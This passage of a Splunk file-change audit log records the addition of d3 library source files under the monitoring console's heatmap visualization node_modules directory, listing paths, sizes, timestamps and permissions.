mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.365, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/time/index.js", isdir=0, size=238, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.360, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/time/hour.js", isdir=0, size=452, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.356, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/time/format.js", isdir=0, size=107, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.351, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/time/format-utc.js", isdir=0, size=62, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.347, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/time/format-iso.js", isdir=0, size=511, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.343, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/time/day.js", isdir=0, size=597, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.234, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/math/trigonometry.js", isdir=0, size=1054, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.230, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/math/transform.js", isdir=0, size=1686, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.227, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/math/random.js", isdir=0, size=791, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.223, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/math/number.js", isdir=0, size=106, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.218, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/math/index.js", isdir=0, size=37, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.214, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/math/adder.js", isdir=0, size=990, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.210, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/math/abs.js", isdir=0, size=20, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.106, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/event/touches.js", isdir=0, size=346, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.100, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/event/touch.js", isdir=0, size=369, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.095, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/event/timer.js", isdir=0, size=2088, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.090, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/event/mouse.js", isdir=0, size=1319, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.085, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/event/index.js", isdir=0, size=101, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.081, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/event/event.js", isdir=0, size=1703, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.074, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/event/drag.js", isdir=0, size=1155, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.065, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/event/dispatch.js", isdir=0, size=1635, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.958, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/layout/treemap.js", isdir=0, size=6586, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.952, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/layout/tree.js", isdir=0, size=7592, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.948, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/layout/stack.js", isdir=0, size=5478, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.943, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/layout/pie.js", isdir=0, size=1989, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.938, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/layout/partition.js", isdir=0, size=1147, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.934, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/layout/pack.js", isdir=0, size=5280, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.930, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/layout/layout.js", isdir=0, size=16, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.925, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/layout/index.js", isdir=0, size=222, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.919, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/layout/histogram.js", isdir=0, size=3510, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.915, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/layout/hierarchy.js", isdir=0, size=3525, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.910, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/layout/force.js", isdir=0, size=9636, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.906, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/layout/cluster.js", isdir=0, size=2670, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.902, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/layout/chord.js", isdir=0, size=3574, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.898, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/layout/bundle.js", isdir=0, size=1518, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.793, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/transition.js", isdir=0, size=683, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.789, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/text.js", isdir=0, size=388, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.785, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/style.js", isdir=0, size=2125, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.781, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/sort.js", isdir=0, size=471, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.777, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/size.js", isdir=0, size=134, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.772, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/selection.js", isdir=0, size=1943, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.768, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/selectAll.js", isdir=0, size=686, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.764, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/select.js", isdir=0, size=825, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.760, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/remove.js", isdir=0, size=289, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.756, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/property.js", isdir=0, size=1379, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.752, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/order.js", isdir=0, size=375, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.748, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/on.js", isdir=0, size=2878, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.745, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/node.js", isdir=0, size=265, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.740, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/interrupt.js", isdir=0, size=813, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.736, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/insert.js", isdir=0, size=297, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.728, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/index.js", isdir=0, size=20, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.723, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/html.js", isdir=0, size=380, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.718, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/filter.js", isdir=0, size=676, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.713, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/enter.js", isdir=0, size=676, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.709, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/enter-select.js", isdir=0, size=678, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.703, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/enter-insert.js", isdir=0, size=538, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.699, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/empty.js", isdir=0, size=90, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.693, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/each.js", isdir=0, size=436, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.689, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/datum.js", isdir=0, size=174, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.684, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/data.js", isdir=0, size=2922, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.680, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/classed.js", isdir=0, size=2512, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.676, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/call.js", isdir=0, size=187, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.672, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/attr.js", isdir=0, size=1974, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.668, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection/append.js", isdir=0, size=772, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.463, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/dsv/tsv.js", isdir=0, size=67, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.459, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/dsv/index.js", isdir=0, size=42, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.455, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/dsv/dsv.js", isdir=0, size=3779, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.451, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/dsv/csv.js", isdir=0, size=49, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.347, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/behavior/zoom.js", isdir=0, size=11028, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.342, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/behavior/index.js", isdir=0, size=49, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.337, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/behavior/drag.js", isdir=0, size=2897, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.334, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/behavior/behavior.js", isdir=0, size=18, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.330, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom/voronoi/red-black.js", isdir=0, size=5507, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.325, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom/voronoi/index.js", isdir=0, size=1530, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.322, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom/voronoi/edge.js", isdir=0, size=1573, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.317, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom/voronoi/clip.js", isdir=0, size=1936, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.312, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom/voronoi/circle.js", isdir=0, size=1683, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.306, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom/voronoi/cell.js", isdir=0, size=1825, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.303, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom/voronoi/beach.js", isdir=0, size=4710, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.196, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom/voronoi.js", isdir=0, size=3009, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.189, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom/voronoi", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:08.185, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom/quadtree.js", isdir=0, size=6955, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.180, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom/polygon.js", isdir=0, size=2474, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.174, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom/point.js", isdir=0, size=93, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.168, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom/index.js", isdir=0, size=104, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.161, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom/hull.js", isdir=0, size=2812, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.156, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom/geom.js", isdir=0, size=14, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.150, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom/delaunay.js", isdir=0, size=162, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.143, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom/clip-line.js", isdir=0, size=1337, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.036, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/zh-CN.js", isdir=0, size=702, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.032, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/time-scale.js", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.029, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/time-format.js", isdir=0, size=12285, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.024, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/sv-SE.js", isdir=0, size=618, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.018, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/ru-RU.js", isdir=0, size=794, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.013, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/pt-BR.js", isdir=0, size=618, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.008, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/pl-PL.js", isdir=0, size=800, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.004, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/number-format.js", isdir=0, size=5642, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:08.000, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/nl-NL.js", isdir=0, size=620, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.995, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/mk-MK.js", isdir=0, size=795, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.992, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/locale.js", isdir=0, size=192, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.987, user=n/a, 